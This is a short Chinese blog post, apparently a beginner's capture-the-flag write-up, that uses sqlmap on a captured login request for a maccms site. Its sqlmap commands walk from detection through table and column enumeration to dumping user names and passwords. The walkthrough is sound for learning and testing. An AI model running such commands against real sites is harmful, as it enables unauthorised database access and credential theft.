写在前面:现在用sqlmap把上一篇文章干的事情重复一遍。其实正常就应该直接上sqlmap,但是稍微手工注入一下对我这种入门菜鸡还是有点好处的吧
下面演示用sqlmap把我爆了一天的表秒了(后来发现好慢啊,可能因为注入方法不一样吧)
登陆界面抓包存txt,用sqlmap尝试寻找注入点
sqlmap常用指令blog.csdn.net/zsf1235/art…
sqlmap -r bad.txt
时间盲注?,which还没学xd
查当前数据库名称sqlmap -r bad.txt -current-db
查表名sqlmap -r bad.txt -D maccms -tables
有25个表
然后看着sqlmap小朋友像个蜗牛一样慢慢爆出了表名...(由于要睡觉,就先润了)
查表里的列名sqlmap -r bad.txt -D maccms -T tsctf_user -columns
估计用sqlmap做的大哥们中间睡了一觉。
最后查看字段值
sqlmap -r bad.txt -D maccms -T tsctfj_user -C user_name,user_pwd -dump
基本看到账号密码了,润了润了---^_^)
